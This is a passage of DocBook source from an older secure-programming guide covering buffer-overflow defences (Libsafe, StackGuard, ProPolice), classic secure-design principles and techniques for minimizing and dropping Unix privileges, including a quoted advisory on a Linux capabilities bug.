implement the original functionality, but in a manner that ensures
|
||
that any buffer overflows are contained within the current stack frame.
|
||
Their initial performance analysis suggests that this
|
||
library's overhead is very small.
|
||
Libsafe papers and source code are available at
|
||
<ulink url="http://www.research.avayalabs.com/project/libsafe">
|
||
http://www.research.avayalabs.com/project/libsafe</ulink>.
|
||
<!-- <ulink url="http://www.bell-labs.com/org/11356/libsafe.html">http://www.bell-labs.com/org/11356/libsafe.html</ulink>.
|
||
-->
|
||
The Libsafe source code is available under the completely
|
||
open source LGPL license.
|
||
</para>
|
||
|
||
<para>
|
||
Libsafe's approach appears somewhat useful.
|
||
Libsafe should certainly be considered for inclusion by Linux
|
||
distributors, and its approach is worth considering by others as well.
|
||
For example, I know that the Mandrake distribution of Linux (version
|
||
7.1) includes it.
|
||
<!-- http://www.sopac.org/linux/RPM/mandrake/7.1/Mandrake/RPMS2/Linux-Mandrake.html -->
|
||
However, as a software developer, Libsafe is a useful mechanism
|
||
to support defense-in-depth but it does not really prevent buffer
|
||
overflows.
|
||
Here are several reasons why you shouldn't depend just on Libsafe
|
||
during code development:
|
||
<itemizedlist>
|
||
|
||
<listitem><para>
|
||
Libsafe only protects a small set of known functions with obvious
|
||
buffer overflow issues.
|
||
At the time of this writing, this list is significantly shorter than
|
||
the list of functions in this book known to have this problem.
|
||
It also won't protect against code you write yourself (e.g., in
|
||
a while loop) that causes buffer overflows.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Even if libsafe is installed in a distribution, the way it is installed
|
||
impacts its use.
|
||
The documentation recommends setting LD_PRELOAD
|
||
to cause libsafe's protections to be enabled, but the problem
|
||
is that users can unset this environment variable... causing the
|
||
protection to be disabled for programs they execute!
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Libsafe only protects against buffer overflows of the stack onto the
|
||
return address;
|
||
you can still overrun the heap or other variables in that procedure's frame.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Unless you can be assured that all deployed platforms will use libsafe
|
||
(or something like it), you'll have to protect your program as though
|
||
it wasn't there.
|
||
</para></listitem>
|
||
|
||
|
||
<listitem><para>
|
||
LibSafe seems to assume that saved frame pointers are at the beginning of
|
||
each stack frame. This isn't always true.
|
||
Compilers (such as gcc) can optimize away things, and in particular the
|
||
option "-fomit-frame-pointer" removes the information that libsafe
|
||
seems to need.
|
||
Thus, libsafe may fail to work for some programs.
|
||
<!-- More info at:
|
||
http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/109/1.html
|
||
http://www2.merton.ox.ac.uk/~security/security-audit-200004/0069.html -->
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
The libsafe developers themselves acknowledge that software developers
|
||
shouldn't just depend on libsafe.
|
||
In their words:
|
||
|
||
<blockquote><para>
|
||
It is generally accepted that the best solution to
|
||
buffer overflow attacks is to fix the defective programs.
|
||
However, fixing defective programs requires knowing that
|
||
a particular program is defective.
|
||
The true benefit of using libsafe and other alternative
|
||
security measures is protection against future attacks
|
||
on programs that are not yet known to be vulnerable.
|
||
</para></blockquote>
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="other-buffer-libraries">
|
||
<title>Other Libraries</title>
|
||
|
||
<para>
|
||
The glib (not glibc) library is a widely-available
|
||
open source library that provides
|
||
a number of useful functions for C programmers.
|
||
GTK+ and GNOME both use glib, for example.
|
||
As I noted earlier, in glib version 1.3.2, g_strlcpy() and g_strlcat() have
|
||
been added through a patch which I submitted. This should make it easier to
|
||
portably use those functions once these later versions of glib
|
||
become widely available.
|
||
At this time I do not have an analysis showing definitively that the
|
||
glib library functions protect against buffer overflows.
|
||
However, many of the glib functions automatically allocate memory,
|
||
and those functions automatically
|
||
<emphasis>fail with no reasonable way to intercept the failure</emphasis>
|
||
(e.g., to try something else instead).
|
||
As a result, in many cases most glib functions cannot
|
||
be used in most secure programs.
|
||
The GNOME guidelines recommend using functions such as
|
||
g_strdup_printf(), which is fine as long as it's okay if your program
|
||
immediately crashes if an out-of-memory condition occurs.
|
||
However, if you can't accept this, then using such routines isn't appropriate.
|
||
</para>
|
||
|
||
<!--
|
||
??? Need to investigate if standard demands safety.
|
||
C++ has a set of string classes and templates as well
|
||
(see basic_string and string)
|
||
-->
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="compilation-c">
|
||
<title>Compilation Solutions in C/C++</title>
|
||
|
||
<para>
|
||
A completely different approach is to use compilation methods that perform
|
||
bounds-checking (see [Sitaker 1999] for a list).
|
||
In my opinion, such tools are very useful in having multiple layers of
|
||
defense, but it's not wise to use this technique as your sole defense.
|
||
There are at least two reasons for this.
|
||
First of all, such tools generally only provide a partial defense against
|
||
buffer overflows (and the ``complete'' defenses are generally
|
||
12-30 times slower); C and C++ were simply not designed to protect
|
||
against buffer overflows.
|
||
<!--
|
||
See Bugtraq, 23 Apr 2002,
|
||
Iv<EFBFBD>n Arce <core.lists.bugtraq@core-sdi.com>,
|
||
which discusses how to circumvent them.
|
||
-->
|
||
Second of all, for open source programs you cannot be certain what tools
|
||
will be used to compile the program; using the default ``normal'' compiler
|
||
for a given system might suddenly open security flaws.
|
||
</para>
|
||
|
||
<para>
|
||
One of the more useful tools is ``StackGuard'', a modification of the
|
||
standard GNU C compiler gcc.
|
||
StackGuard works by inserting a ``guard'' value (called a ``canary'')
|
||
in front of the return address; if a buffer overflow
|
||
overwrites the return address, the canary's value (hopefully) changes
|
||
and the system detects this before using it.
|
||
This is quite valuable, but note that this does not protect against
|
||
buffer overflows overwriting other values (which they may still be able
|
||
to use to attack a system).
|
||
There is work to extend StackGuard to be able to add canaries to other
|
||
data items, called ``PointGuard''.
|
||
PointGuard will automatically protect certain values (e.g., function
|
||
pointers and longjump buffers).
|
||
However, protecting other variable types using PointGuard
|
||
requires specific programmer intervention (the programmer
|
||
has to identify which data values must be protected with canaries).
|
||
This can be valuable, but it's easy to accidentally omit
|
||
protection for a data value you didn't think needed protection -
|
||
but needs it anyway.
|
||
More information on StackGuard, PointGuard, and other alternatives
|
||
is in Cowan [1999].
|
||
</para>
|
||
|
||
<para>
|
||
<ulink url="http://www.trl.ibm.com/projects/security/ssp">
|
||
IBM has developed a stack protection system called ProPolice
|
||
based on the ideas of StackGuard</ulink>.
|
||
IBM doesn't include the ProPolice in its current website - it's just called
|
||
a "GCC extension for protecting applications from stack-smashing attacks."
|
||
Like StackGuard, ProPolice
|
||
is a GCC (Gnu Compiler Collection) extension for
|
||
protecting applications from stack-smashing attacks.
|
||
Applications written in C are protected by automatically inserting
|
||
protection code into an application at compilation time.
|
||
ProPolice is slightly different than StackGuard, however, by adding
|
||
three features:
|
||
(1) reordering local variables to place buffers after pointers
|
||
(to avoid the corruption of pointers that could be used
|
||
to further corrupt arbitrary memory locations),
|
||
(2) copying pointers in function arguments to an area
|
||
preceding local variable buffers (to prevent the corruption of pointers
|
||
that could be used to further corrupt arbitrary memory locations), and
|
||
(3) omitting instrumentation code from some functions
|
||
(it basically assumes that only character arrays are dangerous; while
|
||
this isn't strictly true, it's mostly true, and as a result ProPolice
|
||
has better performance while retaining most of its protective capabilities).
|
||
The IBM website includes information for how to build Red Hat Linux and
|
||
FreeBSD with this protection;
|
||
<ulink url="http://www.deadly.org/article.php3?sid=20021202175508">OpenBSD
|
||
has already added ProPolice to their base system</ulink>.
|
||
I think this is extremely promising, and I hope to see this capability included
|
||
in future versions of gcc and used in various distributions.
|
||
In fact, I think this kind of capability should be the default -
|
||
this would mean that the largest single class of attacks would no longer
|
||
enable attackers to take control in most cases.
|
||
</para>
|
||
|
||
<para>
|
||
As a related issue, in Linux you could modify the Linux kernel so that
|
||
the stack segment is not executable; such a patch to Linux does exist
|
||
(see Solar Designer's patch, which includes this, at
|
||
<ulink
|
||
url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>
|
||
However, as of this writing this is not built into the Linux kernel.
|
||
Part of the rationale is that this is less protection than it seems;
|
||
attackers can simply force the system to call other ``interesting'' locations
|
||
already in the program (e.g., in its library, the heap,
|
||
or static data segments).
|
||
Also, sometimes Linux does require executable code in the stack,
|
||
e.g., to implement signals and to implement GCC ``trampolines''.
|
||
Solar Designer's patch does handle these cases, but this does
|
||
complicate the patch.
|
||
Personally, I'd like to see this merged into the main Linux
|
||
distribution, since it does make attacks somewhat more difficult and
|
||
it defends against a range of existing attacks.
|
||
However, I agree with Linus Torvalds and others
|
||
that this does not add the amount of protection it would appear to and
|
||
can be circumvented with relative ease.
|
||
You can read Linus Torvalds' explanation for not including this support at
|
||
<!-- was: http://lwn.net/980806/a/linus-noexec.html -->
|
||
<ulink url="http://old.lwn.net/1998/0806/a/linus-noexec.html">
|
||
http://old.lwn.net/1998/0806/a/linus-noexec.html</ulink>.
|
||
|
||
</para>
|
||
|
||
<para>
|
||
In short, it's better to work first on developing a correct program
|
||
that defends itself against buffer overflows.
|
||
Then, after you've done this, by all means use techniques and tools
|
||
like StackGuard as an additional safety net.
|
||
If you've worked hard to eliminate buffer overflows in the code itself,
|
||
then StackGuard (and tools like it) are
|
||
are likely to be more effective because there will be
|
||
fewer ``chinks in the armor'' that StackGuard will be called on to protect.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="other-languages">
|
||
<title>Other Languages</title>
|
||
|
||
<para>
|
||
The problem of buffer overflows is an excellent argument for using
|
||
other programming languages
|
||
such as Perl, Python, Java, and Ada95.
|
||
After all, nearly all other programming languages used today
|
||
(other than assembly language) protect against buffer overflows.
|
||
Using those other languages does not eliminate all problems, of course;
|
||
in particular see the discussion in <xref linkend="handle-metacharacters">
|
||
regarding the NIL character.
|
||
There is also the problem of ensuring that those other languages'
|
||
infrastructure (e.g., run-time library) is available and secured.
|
||
Still, you should certainly consider using other programming languages
|
||
when developing secure programs to protect against buffer overflows.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="internals">
|
||
<title>Structure Program Internals and Approach</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 25:28 (NIV)</attribution>
|
||
<para>
|
||
Like a city whose walls are broken down is a man who lacks self-control.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="follow-good-principles">
|
||
<title>Follow Good Software Engineering Principles for Secure Programs</title>
|
||
|
||
<para>
|
||
Saltzer [1974] and later Saltzer and Schroeder [1975]
|
||
list the following principles of the design of secure
|
||
protection systems, which are still valid:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Least privilege</emphasis>.
|
||
Each user and program should operate using the fewest privileges possible.
|
||
This principle limits the damage from an accident, error, or attack.
|
||
It also reduces the number of potential interactions among privileged programs,
|
||
so unintentional,
|
||
unwanted, or improper uses of privilege are less likely to occur.
|
||
This idea can be extended to the internals of a program: only the smallest
|
||
portion of the program which needs those privileges should have them.
|
||
See <xref linkend="minimize-privileges"> for more about how to do this.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Economy of mechanism/Simplicity</emphasis>.
|
||
The protection system's design should be simple and
|
||
small as possible.
|
||
In their words,
|
||
``techniques such as line-by-line inspection of software and physical
|
||
examination of hardware that implements protection mechanisms are necessary.
|
||
For such techniques to be successful, a small and simple design is essential.''
|
||
This is sometimes described as the ``KISS'' principle
|
||
(``keep it simple, stupid'').
|
||
</para>
|
||
</listitem>
|
||
|
||
|
||
<listitem>
|
||
<para>
|
||
<emphasis remap="it">Open design</emphasis>.
|
||
The protection mechanism must not depend on attacker ignorance.
|
||
Instead, the mechanism should be public, depending on the secrecy of
|
||
relatively few (and easily changeable) items like passwords or private keys.
|
||
An open design makes extensive public scrutiny possible, and it also
|
||
makes it possible for users to convince themselves that the system about
|
||
to be used is adequate.
|
||
Frankly, it isn't realistic to try to maintain secrecy for a system that
|
||
is widely distributed;
|
||
decompilers and subverted hardware can quickly expose any ``secrets''
|
||
in an implementation.
|
||
Bruce Schneier argues that smart engineers should ``demand
|
||
open source code for anything related to security'',
|
||
as well as ensuring that it receives widespread review and that
|
||
any identified problems are fixed [Schneier 1999].
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
<emphasis remap="it">Complete mediation</emphasis>.
|
||
Every access attempt must be checked; position the mechanism
|
||
so it cannot be subverted.
|
||
For example, in a client-server model, generally the server must do all
|
||
access checking because users can build or modify their own clients.
|
||
This is the point of all of
|
||
<xref linkend="input">, as well as
|
||
<xref linkend="secure-interface">.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Fail-safe defaults (e.g., permission-based approach)</emphasis>.
|
||
The default should be denial of service, and the
|
||
protection scheme should then identify conditions under which
|
||
access is permitted.
|
||
See <xref linkend="safe-configure"> and <xref linkend="fail-safe">
|
||
for more.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Separation of privilege</emphasis>.
|
||
Ideally, access to objects should depend on more than one condition, so
|
||
that defeating one protection system won't enable complete access.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Least common mechanism</emphasis>.
|
||
Minimize the amount and
|
||
use of shared mechanisms (e.g. use of the /tmp or /var/tmp directories).
|
||
Shared objects provide potentially dangerous channels for information
|
||
flow and unintended interactions.
|
||
See <xref linkend="avoid-race"> for more information.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Psychological acceptability / Easy to use</emphasis>.
|
||
The human interface must be designed for ease of use so users will routinely
|
||
and automatically use the protection mechanisms correctly.
|
||
Mistakes will be reduced if
|
||
the security mechanisms closely match the user's mental image of
|
||
his or her protection goals.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
A good overview of various design principles for security is available in
|
||
Peter Neumann's
|
||
<ulink url="http://www.csl.sri.com/users/neumann/chats.html#4">
|
||
Principled Assuredly Trustworthy Composable Architectures</ulink>.
|
||
<!--
|
||
???: Add:
|
||
http://www.csl.sri.com/neumann/chats2.pdf
|
||
http://www.csl.sri.com/neumann/chats2.ps
|
||
-->
|
||
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="secure-interface">
|
||
<title>Secure the Interface</title>
|
||
|
||
<para>
|
||
Interfaces should be minimal (simple as possible), narrow
|
||
(provide only the functions needed), and non-bypassable.
|
||
Trust should be minimized.
|
||
Consider limiting the data that the user can see.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="data-vs-control">
|
||
<title>Separate Data and Control</title>
|
||
<para>
|
||
Any files you support should be designed to completely separate
|
||
(passive) data from programs that are executed.
|
||
Applications and data viewers may be used to
|
||
display files developed externally, so in general don't allow them
|
||
to accept programs (also known as ``scripts'' or ``macros'').
|
||
The most dangerous kind is an auto-executing macro that executes
|
||
when the application is loaded and/or when the data is initially
|
||
displayed; from a security point-of-view this is generally
|
||
a disaster waiting to happen.
|
||
</para>
|
||
|
||
<para>
|
||
If you truly must support programs downloaded remotely
|
||
(e.g., to implement an existing standard), make sure that you
|
||
have extremely strong control over what the macro can do
|
||
(this is often called a ``sandbox'').
|
||
Past experience has shown that real sandboxes are hard to implement correctly.
|
||
In fact, I can't remember a single widely-used sandbox that hasn't been
|
||
repeatedly exploited (yes, that includes Java).
|
||
If possible, at least have the programs stored in a separate file, so that
|
||
it's easier to block them out when another sandbox flaw has been found
|
||
but not yet fixed.
|
||
Storing them separately also makes it easier to reuse code and to cache
|
||
it when helpful.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="minimize-privileges">
|
||
<title>Minimize Privileges</title>
|
||
|
||
<para>
|
||
As noted earlier, it is an important general
|
||
principle that programs have the minimal amount of privileges
|
||
necessary to do its job (this is termed ``least privilege'').
|
||
That way, if the program is broken, its damage is limited.
|
||
The most extreme example is to simply not write a secure program at all -
|
||
if this can be done, it usually should be.
|
||
For example, don't make your program setuid or setgid if you can; just
|
||
make it an ordinary program, and require the administrator to log in as such
|
||
before running it.
|
||
</para>
|
||
|
||
<para>
|
||
In Linux and Unix, the primary determiner of a process' privileges
|
||
is the set of id's associated with it:
|
||
each process has a real, effective and saved id for both the user and group
|
||
(a few very old Unixes don't have a ``saved'' id).
|
||
Linux also has, as a special extension, a separate filesystem UID and GID
|
||
for each process.
|
||
Manipulating these values is critical to keeping privileges minimized,
|
||
and there are several ways to minimize them (discussed below).
|
||
You can also use chroot(2) to minimize the files visible to a program,
|
||
though using chroot() can be difficult to use correctly.
|
||
There are a few other values determining privilege in Linux and Unix, for
|
||
example, POSIX capabilities (supported by Linux 2.2 and greater, and by
|
||
some other Unix-like systems).
|
||
</para>
|
||
|
||
<sect2 id="mimimize-privileges-granted">
|
||
<title>Minimize the Privileges Granted</title>
|
||
|
||
<para>
|
||
Perhaps the most effective technique is to simply minimize
|
||
the highest privilege granted.
|
||
In particular, avoid granting a program root privilege if possible.
|
||
Don't make a program <emphasis remap="it">setuid root</emphasis> if it only needs access
|
||
to a small set of files;
|
||
consider creating separate user or group accounts for different function.
|
||
</para>
|
||
|
||
<para>
|
||
A common technique is to
|
||
create a special group, change a file's group ownership to that group,
|
||
and then make the program <emphasis remap="it">setgid</emphasis> to that group.
|
||
It's better to make a program <emphasis remap="it">setgid</emphasis> instead of <emphasis remap="it">setuid</emphasis>
|
||
where you can,
|
||
since group membership grants fewer rights (in particular, it does not
|
||
grant the right to change file permissions).
|
||
</para>
|
||
|
||
<para>
|
||
This is commonly done for game high scores.
|
||
Games are usually setgid <emphasis remap="it">games</emphasis>,
|
||
the score files are owned by the group <emphasis remap="it">games</emphasis>,
|
||
and the programs themselves and their configuration files
|
||
are owned by someone else (say root).
|
||
Thus, breaking into a game allows the perpetrator to change high scores but
|
||
doesn't grant the privilege to change the game's executable or
|
||
configuration file.
|
||
The latter is important; if an attacker could change a game's executable
|
||
or its configuration files (which might control what the executable runs),
|
||
then they might be able to gain control of a user who ran the game.
|
||
</para>
|
||
|
||
<para>
|
||
If creating a new group isn't sufficient, consider creating a
|
||
new pseudouser (really, a special role) to manage a set of resources -
|
||
often a new pseudogroup (again, a special role) is also created just
|
||
to run a program.
|
||
Web servers typically do this; often web servers are set up with a special
|
||
user (``nobody'') so that they can be isolated from other users.
|
||
Indeed, web servers are instructive here: web servers typically need
|
||
root privileges to start up (so they can attach to port 80), but once
|
||
started they usually shed all their privileges and run as the user ``nobody''.
|
||
However, don't use the ``nobody'' account (unless you're writing a
|
||
webserver); instead, create your own pseudouser or new group.
|
||
The purpose of this approach is to isolate different programs,
|
||
processes, and data from each other,
|
||
by exploiting the operating system's ability to keep users and groups separate.
|
||
If different programs shared the same account, then breaking into one program
|
||
would also grant privileges to the other.
|
||
Usually the pseudouser should not own the programs it runs;
|
||
that way, an attack who breaks into the account cannot change
|
||
the program it runs.
|
||
By isolating different parts of the system into running separate users
|
||
and groups, breaking one part will not necessarily break the
|
||
whole system's security.
|
||
<!--
|
||
Martijn Vernooij noted http://httpd.apache.org/docs/mod/core.html#user :
|
||
|
||
The user should have no privileges which result in it being able to
|
||
access files which are not intended to be visible to the outside world,
|
||
and similarly, the user should not be able to execute code which is not
|
||
meant for httpd requests. It is recommended that you set up a new user
|
||
and group specifically for running the server. Some admins use user nobody,
|
||
but this is not always possible or desirable.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
If you're using a database system (say, by calling its query interface),
|
||
limit the rights of the database user that the application uses.
|
||
For example, don't give that user access to all of the system stored procedures
|
||
if that user only needs access to a handful of user-defined ones.
|
||
Do everything you can inside stored procedures.
|
||
That way, even if someone does manage to force arbitrary strings into the
|
||
query, the damage that can be done is limited.
|
||
If you must directly pass a regular SQL query with client supplied data
|
||
(and you usually shouldn't), wrap it in something that limits its activities
|
||
(e.g., sp_sqlexec).
|
||
(My thanks to SPI Labs for these database system suggestions).
|
||
<!-- http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf -->
|
||
</para>
|
||
|
||
<para>
|
||
If you <emphasis remap="it">must</emphasis> give a program privileges
|
||
usually reserved for root,
|
||
consider using POSIX capabilities as soon as your program can
|
||
minimize the privileges available to your program.
|
||
POSIX capabilities are available in Linux 2.2 and in many other
|
||
Unix-like systems.
|
||
By calling cap_set_proc(3) or the Linux-specific capsetp(3)
|
||
routines immediately after starting, you can permanently
|
||
reduce the abilities of your program to just those abilities it actually needs.
|
||
For example the network time daemon (ntpd) traditionally has run as root,
|
||
because it needs to modify the current time.
|
||
However, patches have been developed so ntpd only needs a single
|
||
capability, CAP_SYS_TIME, so even if an attacker gains control over
|
||
ntpd it's somewhat more difficult to exploit the program.
|
||
</para>
|
||
|
||
<para>
|
||
I say ``somewhat limited'' because, unless other steps are taken,
|
||
retaining a privilege using POSIX capabilities
|
||
requires that the process continue to have the root user id.
|
||
Because many important files (configuration files, binaries, and so on)
|
||
are owned by root, an attacker controlling a program
|
||
with such limited capabilities can still modify
|
||
key system files and gain full root-level privilege.
|
||
A Linux kernel extension (available in versions 2.4.X and 2.2.19+)
|
||
<!-- It's available from 2.3.99-pre3 on, but now that 2.4's released the
|
||
exact development version is only of academic interest.
|
||
Chris Evans thought it might also be available in 2.2.18, but wasn't
|
||
sure, so I thought I'd be safe and specify 2.2.19. -->
|
||
provides a better way to limit the available privileges:
|
||
a program can start as root (with all POSIX capabilities),
|
||
prune its capabilities down to just what it needs, call
|
||
prctl(PR_SET_KEEPCAPS,1), and then use setuid() to change to a
|
||
non-root process.
|
||
The PR_SET_KEEPCAPS setting marks a process so that when a process does
|
||
a setuid to a nonzero value, the capabilities aren't cleared
|
||
(normally they are cleared).
|
||
This process setting is cleared on exec().
|
||
However, note that PR_SET_KEEPCAPS is a Linux-unique extension for newer
|
||
versions of the linux kernel.
|
||
</para>
|
||
|
||
<para>
|
||
One tool you can use to simplify minimizing granted privileges
|
||
is the ``compartment'' tool developed by SuSE.
|
||
This tool, which only works on Linux,
|
||
sets the filesystem root, uid, gid, and/or the
|
||
capability set, then runs the given program.
|
||
This is particularly handy for running some other program without
|
||
modifying it.
|
||
Here's the syntax of version 0.5:
|
||
|
||
<screen width="61">
|
||
|
||
Syntax: compartment [options] /full/path/to/program
|
||
|
||
Options:
|
||
--chroot path chroot to path
|
||
--user user change UID to this user
|
||
--group group change GID to this group
|
||
--init program execute this program before doing anything
|
||
--cap capset set capset name. You can specify several
|
||
--verbose be verbose
|
||
--quiet do no logging (to syslog)
|
||
</screen>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Thus, you could start a more secure anonymous ftp server using:
|
||
|
||
<screen width="61">
|
||
compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd
|
||
</screen>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
At the time of this writing, the tool is immature and not available on
|
||
typical Linux distributions, but this may quickly change.
|
||
You can download the program via
|
||
<ulink
|
||
url="http://www.suse.de/~marc">http://www.suse.de/~marc</ulink>.
|
||
A similar tool is dreamland; you can that at
|
||
<ulink url="http://www.7ka.mipt.ru/~szh/dreamland">
|
||
http://www.7ka.mipt.ru/~szh/dreamland</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Note that <emphasis remap="it">not</emphasis> all Unix-like systems,
|
||
implement POSIX capabilities, and PR_SET_KEEPCAPS is currently
|
||
a Linux-only extension.
|
||
Thus, these approaches limit portability.
|
||
However, if you use it merely as an optional safeguard only
|
||
where it's available, using this
|
||
approach will not really limit portability.
|
||
<!-- http://faqchest.dynhost.com/linux/KERNEL/kern-00/kern-0004/kern-000433/kern00041117_25233.html -->
|
||
<!-- http://www.linuxsecurity.com/feature_stories/kernel-24-security.html -->
|
||
Also, while the Linux kernel version 2.2 and greater includes the low-level
|
||
calls, the C-level libraries to make their use easy are not installed
|
||
on some Linux distributions, slightly complicating their use in applications.
|
||
For more information on Linux's implementation of POSIX capabilities, see
|
||
<ulink
|
||
url="http://linux.kernel.org/pub/linux/libs/security/linux-privs">http://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
FreeBSD has the jail() function for limiting privileges;
|
||
see the
|
||
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail
|
||
documentation</ulink>
|
||
for more information.
|
||
There are a number of specialized tools and extensions for limiting
|
||
privileges; see <xref linkend="unix-extensions">.
|
||
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-time-privilege-usable">
|
||
<title>Minimize the Time the Privilege Can Be Used</title>
|
||
|
||
<para>
|
||
As soon as possible, permanently give up privileges.
|
||
Some Unix-like systems, including Linux,
|
||
implement ``saved'' IDs which store the ``previous'' value.
|
||
The simplest approach is to reset
|
||
any supplemental groups if appropriate (e.g., using setgroups(2)),
|
||
and then set the other id's twice to an untrusted id.
|
||
In setuid/setgid programs, you should usually set the effective gid and uid
|
||
to the real ones, in particular right after a fork(2),
|
||
unless there's a good reason not to.
|
||
Note that you have to change the gid first when dropping from root to another
|
||
privilege or it won't work - once you drop root privileges, you won't
|
||
be able to change much else.
|
||
Note that in some systems, just setting the group isn't enough, if the
|
||
process belongs to supplemental groups with privileges.
|
||
For example, the ``rsync'' program didn't remove the supplementary groups
|
||
when it changed its uid and gid, which created a potential exploit.
|
||
<!--
|
||
Here's Mandrake's alert, I should track down the CVE entry:
|
||
http://lwn.net/alerts/Mandrake/MDKSA-2002%3A024-1.php3
|
||
-->
|
||
</para>
|
||
<!--
|
||
To call other programs from setuid programs, use a structure like this
|
||
to reduce the privileges for the child:
|
||
fork()
|
||
if child:
|
||
setgroups(...) # to set supplementary groups
|
||
setgid(getgid())
|
||
setgid(getgid()) # do it twice to eliminate saved groups
|
||
setuid(getuid())
|
||
setuid(getuid()) # do it twice to eliminate saved uids.
|
||
exec(...)
|
||
|
||
Note that this isn't approriate for servers working on behalf of another
|
||
user, since the current gid/uid is not usually the correct one.
|
||
-->
|
||
|
||
<para>
|
||
It's worth noting that there's a well-known related bug that
|
||
uses POSIX capabilities to interfere with this minimization.
|
||
This bug affects Linux kernel 2.2.0 through 2.2.15, and possibly a number
|
||
of other Unix-like systems with POSIX capabilities.
|
||
See Bugtraq id 1322 on http://www.securityfocus.com for more information.
|
||
Here is their summary:
|
||
<blockquote><para>
|
||
POSIX "Capabilities" have recently been implemented in the Linux kernel.
|
||
These "Capabilities" are an additional form of privilege control to enable
|
||
more specific control over what privileged processes can do. Capabilities are
|
||
implemented as three (fairly large) bitfields, which each bit representing a
|
||
specific action a privileged process can perform. By setting specific bits, the
|
||
actions of privileged processes can be controlled -- access can be granted for
|
||
various functions only to the specific parts of a program that require them.
|
||
It is a security measure. The problem is that capabilities are copied with
|
||
fork() execs, meaning that if capabilities are modified by a parent process,
|
||
they can be carried over. The way that this can be exploited is by setting all
|
||
of the capabilities to zero (meaning, all of the bits are off) in each of the
|
||
three bitfields and then executing a setuid program that attempts to drop
|
||
privileges before executing code that could be dangerous if run as root, such
|
||
as what sendmail does. When sendmail attempts to drop privileges using
|
||
setuid(getuid()), it fails not having the capabilities required to do so in its
|
||
bitfields and with no checks on its return value . It continues executing with
|
||
superuser privileges, and can run a users .forward file as root leading to a
|
||
complete compromise.
|
||
</para></blockquote>
|
||
One approach, used by sendmail, is to attempt to do
|
||
setuid(0) after a setuid(getuid()); normally this should fail.
|
||
If it succeeds, the program should stop.
|
||
For more information, see
|
||
http://sendmail.net/?feed=000607linuxbug.
|
||
In the short term this might be a good idea in
|
||
other programs, though clearly the better
|
||
long-term approach is to upgrade the underlying system.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-time-privilege-active">
|
||
<title>Minimize the Time the Privilege is Active</title>
|
||
|
||
<para>
|
||
Use setuid(2), seteuid(2), setgroups(2),
|
||
and related functions to ensure that the program
|
||
only has these privileges active when necessary,
|
||
and then temporarily deactivate the privilege when it's not in use.
|
||
As noted above, you might want to ensure that these privileges are disabled
|
||
while parsing user input, but more generally, only turn on privileges when
|
||
they're actually needed.
|
||
</para>
|
||
|
||
<para>
|
||
Note that some buffer overflow attacks, if successful, can force a program
|
||
to run arbitrary code, and that code could re-enable privileges that were
|
||
temporarily dropped.
|
||
Thus, there are <emphasis>many</emphasis>
|
||
attacks that temporarily deactivating a privilege won't counter -
|
||
it's always much better to completely drop privileges as soon as possible.
|
||
There are many papers that describe how to do this, such as
|
||
<ulink url="http://www.enderunix.org/docs/en/sc-en.txt">"Designing
|
||
Shellcode Demystified"</ulink>.
|
||
Some people even claim that ``seteuid() [is] considered harmful'' because
|
||
of the many attacks it doesn't counter.
|
||
Still, temporarily deactivating these permissions
|
||
prevents a whole class of attacks,
|
||
such as techniques to convince a program to write into a file that
|
||
perhaps it didn't intend to write into.
|
||
Since this technique prevents many attacks,
|
||
it's worth doing if permanently dropping the privilege can't be done
|
||
at that point in the program.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-privileged-modules">
|
||
<title>Minimize the Modules Granted the Privilege</title>
|
||
|
||
<para>
|
||
If only a few modules are granted the privilege, then it's much
|
||
easier to determine if they're secure.
|
||
One way to do so is to have a single module use the
|
||
privilege and then drop it, so that other modules called later cannot misuse
|
||
the privilege.
|
||
Another approach is to have separate commands in separate
|
||
executables; one command might be a complex
|
||
tool that can do a vast number of tasks for a privileged user (e.g., root),
|
||
while the other tool is setuid but is a small, simple tool that
|
||
only permits a small command subset (and does not trust its invoker).
|
||
The small, simple tool checks to see if the input meets various criteria for
|
||
acceptability, and then if it determines the input is acceptable, it
|
||
passes the data on to the complex tool.
|
||
